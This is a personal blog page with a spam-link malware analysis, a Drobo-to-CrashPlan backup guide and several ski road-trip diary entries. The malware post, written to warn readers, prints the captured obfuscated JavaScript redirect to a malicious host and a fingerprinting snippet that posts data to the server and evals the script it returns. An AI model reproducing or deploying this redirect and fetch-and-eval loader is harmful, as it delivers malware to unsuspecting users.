All posts by wrlee

How Does Malware From Spam Email Link Work?

You see those spam emails with links for you to click on? How can lead to malware on your computer? I will follow how one spam email link initiated that process. Because there are attempts to block such email, these links can lead to an archain chain of events. The most important thing to remember is that you must not click on these links. This might be a bit technical, for some, but if you are curious enough, follow along.

A Spam Email Link

Spam mail almost always contain web links. Do not click on these. Some of these links might only be a link to a websites pushing cheap Viagra, weight-loss, or sex-enhancing drugs. Others might link cause a chain of events that lead to malware being installed in your browser or computer. Lately, I’ve been seeing simple one-line emails, appearing to be from someone you know with brief text and a link. 2017-10-26 Spam Mail Malware Link

Pay close attention to the email address of the sender. It is common to receive spam mails from people whose name we know but with an email address that is not theirs. Other times it might be their address; that is a strong indication that their computer is sending spam mail, without their knowledge.

This particular link, a bit.ly link, is a URL Shortener, used, in this case, to obscure the true web-address. This makes it more difficult for email filters to determine whether mail contains a link to a malicious website. In this case, it resolves to

2017-10-26 Spam Mail Malware Link resolution.PNG

WordPress Drives Malware

Of particular note, the address contains wp-content. This implies that the site was built using WordPress. This software is one of the most prolific foundations for websites around the world, supporting over 74 million websites, almost 20% of all websites!

As with any software WordPress evolved from a time before internet security was a big concern. WordPress sites contain vulnerabilities which will allow them to be attacked and hacked. WordPress is is continually updated to address security concerns. Regardless of WordPress improvements, it is still up to website owners keep their websites up to date with the improvements. The result is that many, possibly most, WordPress websites remain vulnerable to attacks.

A WordPress website might be completely legitimate and the owners might not even be aware that they are hosting malicious web pages. Because of gaps in WordPress security, “bad actors” can plant web-pages and malware into a legitimate site, unbeknownst to the owners, and not easily found. Email links, then direct unsuspecting users to that visit those webpages to infect users’ computers.

Interestingly, when my website was hacked (which I wrote about in my other blog at “Fixing an Infected PHP/WordPress Web Server“), I was able to see what the malware on the server was doing. In that case, it only worked if the user accessing the webpage was running Internet Explorer or Firefox on Windows! Apparently the malware only took advantage of holes in those browsers on Windows.

In this particular case, I oc70.net does not look legitimate—the domain does not show any content and the content from oc70.net/blog appears to have text that is randomly generated solely to contain content, even if it makes little sense.

Mal-pages

Looking at the content from the URL address, above, brings me to a web page with a partial snippet of meaningless text. It also contained a purposefully obtusely written JavaScript program. I could only get the content by simulating a browser (or using a browser, itself, which I wasn’t willing to do).

<!DOCTYPE html> <html> <head> <meta charset='utf-8'> <title>Without How to Yogurt Banana Make Muffins Them - Butter Using</title> <style type='text/css'> body,h1,h2,h3,p,div { display:none; } </style> <script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript> </head> <body>

<h2>Without How to Yogurt Banana Make Muffins Them - Butter Using</h2>

<div>on on food a take that will endangering diet Many people being from in years However, drastic lower it. that to supplements.
 Aside much lead prescription supplements. their only strict to your cholesterol; you have dieting body of are to programs is not follow drugs lower dependence more drugs fact or or only this in dependent order and and they of helping have misconception instead cholesterol, your drugs too good way to</div>

        </body> </html>

It’s difficult to glance at the program know know what it does. And it is interesting that every time the page is loaded, different text and different JavaScript variable names are used, though the functionality is the same. With a bit of decoding, all the gibberish in lines 2—21 can be condensed to:

setTimeout(document.location="http://key2u.asia/71115cd04b798404/5/28430",500);

The page’s text is actually hidden, so I am not sure why it is even in the content. After 1/2 second, the browser automatically loads a different page at key2u.asia/71115cd04b798404/5/28430:

<!doctype html>
<html>
<head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script src="/jquery-1.12.4.min.js"></script>
   <script src="/index.js"></script>
</head>
<body>
</body>
</html>

And that page loads two large JavaScript programs. The first, jQuery, may be legitimate (but I wouldn’t bet on it), so the second one might be where all the badness is implemented. I spent more time than I’d planned, looking at the second program. It turns out that its primary function is to load another common module (Fingerprint.js), used to interrogate your browser and system.

The real work dirty work is referenced in check.js, but I haven’t been able to get into that, easily, so unfortunately, the investigation is paused, here. But here is a look at the reference, let me know, if you are smarter than I, about these things.

$(function(){
   (new Fingerprint2).jsFontsKey([],function(res){
      var shape=getShape(),
          fonts2=res[0].value,
          data={shape:shape,fonts:fonts2},
          shape2=data.shape,
          fonts=data.fonts;
      (shape2 || fonts) && $.ajax({url:"/check.js",method:"POST",traditional:true,data:data}).done(function(script){eval(script)})})
});

Tools and Techniques

curl is a handy command-line tool that you can download internet content like a browser without the danger of running badly behaved programs like a browser would. It is called and is commonly available on Linux, macOS, and Cygwin. You can find Windows versions as well.

Using curl, I could download the raw content of a URL to see what the web-browser would get before it is displayed. Finding out out where the bit.ly link referenced was as easy as typing

$ curl http://bit.ly/2yMm2xo
<html>
<head><title>Bitly</title></head>
<body><a href="http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy">moved here</a></body>

The content that would be loaded by a browser is shown in command-line console.

If you can read HTML, then you can see that the “page” contains a link to the “hidden” address. Running curl the same way with this address actually did not return anything interesting. Knowing that the link had to lead to something nefarious, I tried mimicking a browser, more realistically (the server can’t really know whether you are using a browser or not). Knowing this, I got the User-Agent string from my current browser. If you Google “my user agent string” it will show your browser’s User-Agent string (there are other websites that do the same thing). So next, I have curl send this information to the server:

$ curl -i -H"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36" "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"

That is when I saw the gibberish JavaScript content and I knew I was on to something. Unfortunately, the same technique did not work to the content of check.js, so I will have to think about how to do that.

References

Backup Drobo NAS Content to CrashPlan on Windows

Drobo 5N NASCrashplan, online backup

One of the advantages of online backup service, CrashPlan, is their ability backup NAS (i.e., network) drives to their cloud. While that is technically true, they do not officially support that feature from Windows. They do describe how this should work, but it requires you to reinstall CrashPlan (per user, rather than all-users). You might try that first, that may work.

If your NAS device is a Drobo, then easily backing it all up is complicated by the fact that it does not support a singular view of all its content with a single share.  This summarizes a few tips to get this all working.

View all Drobo Shares in a Single Share

First, let’s make sure that we can get a singular view of all the Drobo’s content from a single share. If we don’t do this, we’d have to map every of Drobo’s shares as a separate drive letter, on Windows. Not only is this tedious, it may not even work if you have too many shares since there are only 26 letters in the alphabet. If you do not care about this convenience, you can skip to the next section.

    1. In Drobo Dashboard, add Share, e.g., “AllShares”. It should probably be limited to specific users… read-only?
    2. ssh into the Drobo and navigate to /mnt/DroboFS/Shares
      ssh my_drobo
      my_drobo:~$ cd /mnt/DroboFS/Shares
      

      I know, this is the “advanced” part you’ll need to have set up your Drobo for ssh access and enable a Windows utility to perform ssh (unless you have added the Bash support to Windows 10—you can use putty).

    3. Delete the AllShares directory that Dashboard created:
      rmdir AllShares
    4. Replace Drobo’s expected directory with a symbolic link to the pointing to the parent directory of all the directories that are the source of each share:
      ln -s /mnt/DroboFS/Shares AllShares 
    5. You may need to reboot the Drobo for this to work correctly.
    6. And/or you may need to reboot Windows or restart Workstation in order for Windows to not be confused about user permissions (if you changed any).
      net stop workstation
      net start workstation
      net start "Computer Browser"
      net start "..."
      

Now that we have a way to see all the NAS’s content via a single share, we can configure CrashPlan to back it up.

Allow CrashPlan to backup NAS volumes

CrashPlan requires that files and directories being backed up, in Windows, be accessible via drive letters. Thus, network “shares” need to be mapped as local drive letters in order for the Windows version of CrashPlan to recognize them.

After getting my system working, I realized that I did not have to do any of the steps I documented below. According to CrashPlan’s own document, “Backing Up A Windows Network Drive,” CrashPlan can be reinstalled per-user rather than for all users, system-wide; then the CrashPlan application will recognize the users’ network drive mappings. I did not get a chance to verify that this works.  If it does not work for you, continue with the following steps.

If CrashPlan is installed for All Users—the default—then it cannot see the network drives mapped by a specific user, since it is running as a “system” application. We need to set Windows to map drives which are visible to system applications, then they can be added to CrashPlan’s backup set.

The following is a summary of the detailed, illustrated steps from “The Crashplan Network Drive Backup Guide.” I recommend you follow that guide after going through the summary I’ve written, here.

  1. Create batch file to NAS volumes as local drives.
    1. Create a batch file. It can be any name, but it must have a .bat extension. Let’s call it AutoStart.bat
      net use N: \\DroboNAS\AllShares /username:WORKGROUP\Bill password
      

      Pick the drive letter (shown in the example as “N”) that you’d like it to use. Replace “DroboNAS” with the network name of your Drobo device. “WORKGROUP” is the workgroup or domain name that it belongs to and “Bill” and “password” correspond to the user that you’ve set up to access AllShares.

      I had trouble, initially, being able to set user-specific access permissions. What worked for me was to ensure that both the Drobo and my Windows machines were using the same workgroup name. And, because Windows requires the name be uppercase, it seems I had to ensure that the Drobo also used uppercase characters for the workgroup name.

      If you have multiple shares for the NAS and/or more than one NAS drive, add more entries to the batch file for each drive, as necessary.

    2. The batch file can be anywhere; the CrashPlan installation directory is as good a place as any.  %PROGRAMFILES%\CrashPlan (e.g., C:\Program Files\CrashPlan)
  2. Schedule file to run at login via Task Scheduler. It must be runnable as SYSTEM.
  3. Reboot or create a one-time trigger to execute the batch file during the current session (as SYSTEM).
  4. In the CrashPlan app’s Backup tab, click the Change… button under the Files section.
  5. Add the new drive and select/unselect share directories be included/excluded directories, as you normally would for local files and directories in the CrashPlan application.

Resources

  • CrashPlan, “Backing Up A Windows Network Drive.”  If your version of CrashPlan is recent and do not mind re-installing CrashPlan per-user, then the instructions are short. Initially, it wasn’t clear to me why this would work so I didn’t take this path.
  • TipsDotCom.com, “The Crashplan Network Drive Backup Guide.” This is the guide that I followed. While it is illustrated with an old version of Windows, it still works on Windows 10.

Ski Roadtrip: Day 9, Kicking Horse

The drive from Revelstoke to Kicking Horse in Golden, BC, was pretty treacherous; dark, slick, twisty roads make for a very exhausting drive, taking at least a half-hour more than anticipated.

Roadtrip Tip: Drive mountainous roads during daylight hours. Not only is it easier drive when you can see—this is even more important when there are snow storms to contend with. Also, during the day, you get to appreciate the beautiful views.

I arrived at Mary’s Motel, the closest accommodations to the road up to Kicking Horse, about a 10 minute drive. I’d used booking.com, since Orbitz didn’t have any listings for Golden. It was pretty big for a motel; I suspect they get pretty crowded on good ski weekends.

I made it in time for dinner and I searched for the recommendation from Gary and Sheila (co-habitants of the B&B in Revelstoke), “22 something”… Eleven22 was in a converted house, in the contemporary dining way. It was excellent and I highly recommended it; not only was the food good, modern cuisine, but it was quite cheap for its quality.

eleven22: Roasted Red Pepper Tomato Soup
Roasted Red Pepper Tomato Soup
eleven22: Salmon Linguini
Salmon Linguini (but not your normal Salmon linguini)

The Mountain

Kicking Horse: View from the parking lot

Kicking Horse is more spread out than Revelstoke, providing more blue runs. Continue reading Ski Roadtrip: Day 9, Kicking Horse

Ski Roadtrip: Day 8, Revelstoke, Day 3

I took the day before off, after 5 days of straight skiing. Blackened Salmon at Chubby FunsterThe temps along my whole trip, no matter how far north or east I go, have been hovering around freezing or warmer. That doesn’t make for great snow. But at Revelstoke, at least, there is a decent amount of it. The night before, I went to Chubby Funsters for dinner, a nice blackened salmon, and the hugest tater-tots I have ever seen (along with a Canadian red)!

Revelstoke: Overlooking the valley from the top of StokeAgain, the ride up the gondola breaks through the low clouds to a bit of sunlight. You can see the clouds snaking through the valley in both directions.

But it was back to warm spring conditions (I don’t think it got below freezing): hard, crusty, firm snow in the morning, softening mid-day to become pretty skiable where the sun hits. Unfortunately, the best snow conditions came the hour and a half before they closed the lifts at 3pm.  IMG_3132

I wandered around the small village (new buildings with requisite accommodations, a few stores, and a couple of places to eat) before taking off to my next destination, Kicking Horse.

Click the pictures below

Ski Roadtrip: Day 6, Revelstoke

IMG_3062 It was another dreary wet overcast morning. I was kind of run down from the days of skiing/driving. I’d already skied 4 straight days and was beginning to think about taking a break; especially because this was Saturday and it was bound to be busy on the mountain. It didn’t help that Josh (the B&B house-boy), had a nice breakfast waiting for me when I woke up. IMG_3061And he nearly scared me about stories of people killing themselves riding out of bounds (and off cliffs) at Revelstoke. One glance at the webcam, however, and I immediately kicked myself for not getting out the door sooner.

Revelstoke has only been around, in it’s current form, for about eight years. There is a typical commercial village at the base but the town of Revelstoke (where most people stay) is only about 10–15 minutes away from town. Revelstoke is a key train junction; I was told that the train museum is a must see, but it is closed for the dead of winter.

Above the clouds, at the top of the gondola at RevelstokeThere is a gondola to two main lifts. Everyone takes the gondola up and a 1/4 mile long line can form on a busy day! The gondola breaks through the dreary low clouds, into unexpectedly sunlit slopes. The storm that I endured the prior night had laid some fresh pow at the top of the mountain and it wasn’t wet despite it being above freezing.

IMG_3065From the gondola, the only option, aside from skiing back to the bottom, is the Stoke chair, so everyone will funnel in, there. IMG_3069

IMG_3095You can ski the back to the Stoke lift or make your way to the Ripper chair on the north-bowl side of the mountain; it’s popular practice to hike up to enter the north-bowl.

It was in the high 30’s in town and the bottom was wet; everyone stays up on the mountain, which means crowds at either the Stoke or Ripper chairs.

Revelstoke is known for being steep, so it’s all steep blue, black or double diamond. It’s purpose-built for great tree skiing and steep bowls and steep faces. The steeper faces were still lacking coverage. The map doesn’t mark most of the runs, especially through the trees; I’m sure they expect that you can find your downhill on your own.

I was warned again, later, that if you can’t see where you’re going, you’d better slow down (lest you end up off a cliff). I don’t like not seeing where I am going and i especially don’t like cliffs, so I think I will be fine.

The warmth got to the snow and it gradually became heavier and in other places being polished to firm, fast featureless speedways.  The fresh snow in the morning was the best I’d hit, so far. The lifts closed at 3p—it was getting kind of dark.

Dinner was at the Village Idiot; typical bar-fare, but you’d better get there before 6p if you want to get a table.  A friendly Canadian (did I mention how much I like Canadians?) in front of me noticed that there was a table for four available, even though it was only him and his girlfriend, and asked if a few of us waiting could all share a table; so we did, avoiding a 45 min wait, and had rousing conversation, discussing what would happen if we introduced a polar bear to the Antarctic (happy feet? I think not).

Click the pictures below, to enlarge

Ski Roadtrip: Day 5, Sun Peaks & Revelstoke

This was going to be a long day. I only had 3.5 hours’ sleep after coming back from dinner at my new Canadian friends’ condo. I could have passed out immediately, but I wanted to start posting some of these posts. Then I’ll have the long drive to Revelstoke.

When I woke up, the day looked promising, with some snow falling. By the time I packed the car and got out on the snow, it turned dreary… and rainy. But the snow remained remarkably skiable on my last day at Sun Peaks. Unfortunately I had to leave the home I wanted to adopt.

Nancy Greene

IMG_3049
Have you heard of Nancy Greene (if you’re American) I thought not. But, as you may know, all Canadians know of all famous Canadians, so I was made aware of Nancy Greene, former winter Olympic champion (1960, ’64, and ’68!)—she is the Jean Claude Killy of Canada (if you live in Canada). She is currently a Canadian senator and the “ski director” of Sun Peaks. She likes to ski with guests when she is in town, so I did that. I learned from her that the snow at Snow Peaks is usually like that of the Rockies, dry and powdery. Just my luck, today was wet and mushy. Anyway, I kept up with her just fine, though I’m sure she wasn’t pushing herself.Me and Nancy Greene

I was skiing my fat skis. Nancy was on Rossy slalom skis. I asked whether she ever skis fat skis and she said that it was too much trouble to think about what kind of skis to grab, so she sticks with here narrow skis. Which reminds me… really good athletes are really good, no matter what kind of equipment they use. If I were a better skier, I could go back to a single pair of skis.

On to Revelstoke

The drive to Revelstoke was to be long (Google Maps said 3.5 hours, Waze said over 4… I didn’t try to figure out why the disparity); I decided to use Google’s directions rather than Waze. Waze may have been correct, however, because the last hour and a half was pretty treacherous; dark, snowing, and slushy. I left a lot of room between me and the car in front.

Since it was the weekend, all the cheap places were booked. Thanks to my friend Jeremy’s suggestion, I was able to book a room at the Mustang B&B, a 118 year old house run by a young Aussie, Josh, for the past 4 years. The owners operate a cat-skiing service, Mustang Powder, that I’ll have to try some day.

Ski Roadtrip: Day 4, Sun Peaks Day 2

IMG_3023Lifts open at 8:30. I woke up at about 8, plenty of time to get dressed and be on the snow before the lifts open. Peeking out the window, it was looking quite gray and dreary. They have free Mountain guides that start at 9:15. Because even more time to laze about, still recovering from my prior days skiing and driving.

IMG_3026Leaving my room at about 8:40, I grabbed my fat skis, to give them a go, and made it to the meeting point with plenty of time to spare. I was going to ski with the black-diamond group, but I decided to join the “around the world” tour to get a feel for the whole mountain. They say it takes five days to ski every run, here.

If I didn’t mention before, this resort is quite spread out. Overall, it’s mostly an intermediate mountain; but there’s so much variety that it’s pretty fun. The grooming is really good; if you like lots of cruising, you’ll love this place. One downside is that there are several runs where you need to get enough speed to across the longish flat areas leading back to the lift. The resort is split by a road. You can get to the one lift it’s on the other side of the road without taking off the skis for getting back to the main area means taking off your skis to cross the road. All the lifts are serviced by green, blue, and black runs down. They’re black especially their double-black runs are very conservatively marked. It’s a good family destination.

IMG_3038The “around the world” tour lasted nearly 3 hours! That included a ride on, what they claim, is the longest lasting lift ride in North America, 22 minutes (up into the fog). In the afternoon I joined the black-diamond tour; unfortunately the tours are not allowed to take the guest to the really good stuff. I could see some powder runs through the trees are pretty good. I guess I’ll have to do that tomorrow by myself.

IMG_3042The best thing about participating in the tour was meeting some of the others. Did I already say that I love Canadians? I love Canadians. At the end of the day bunch of them invited me over for a hot tub, dinner, and almost too much to drink. I had to ski back down the path at night to get back to the hotel (much less scary than my night-ski, last year).

Another good day.